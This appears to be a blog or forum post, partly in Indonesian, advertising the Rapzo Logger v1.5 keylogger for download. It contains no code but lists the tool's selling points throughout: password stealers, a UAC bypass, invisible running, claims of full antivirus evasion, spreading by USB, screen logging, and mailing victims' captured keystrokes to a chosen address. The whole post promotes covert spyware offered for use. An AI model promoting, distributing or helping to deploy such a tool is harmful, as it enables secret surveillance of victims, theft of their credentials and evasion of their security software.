Rapzo Logger v 1.5 keylogger ( Keylogger Online )

NB : Klik Gambar Buat Download

Stealers [6] All Stealers Pure Code - No Drops + Runtime FUD
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[#] No-Ip
Features [25]
* Full UAC Bypass & Faster Execution
* Coded in Vb.NET* Min Req Is .net 2.0 Now A days every pc Have it* Cool & user friendly GUI* Easily Understandble
* Encrypt Information
* Encrypt E-mail information* 100% FUD from all AV's
* 4 Extentions [ . exe | .scr | .pif | .com ]
* Keylogger support - Smtp[Gmail,Hotmail,live,aol,]
* Test E-mail - is it vaild or not.
* Customize the "To" e-mail address.
* Screen Logger
* Cure.exe to remove server from your Compute
* Usb Spreade
* File pumper - Built-in
* Icon Changer - Preview
* Logs are nice and clear
* Log Letters - ABCD etc.
* Log Symbols - !@#$% etc.
* Log Numbers - 12345 etc.
* Log specific key's - [F4][F5][TAB][HOME][Pg Dn][Pause Break][Prtsc SysRq].. Etc.
* Hidden really good & invisible* Send new logs over and over again* ReadMe.txt - How To Use
* Vedio Tutorial - How To Use
Working on all Windows Operating System's - [Winxp\vista\W7] --- [32 + 64 ] Bit Computers
Sumber : BlooderZ 

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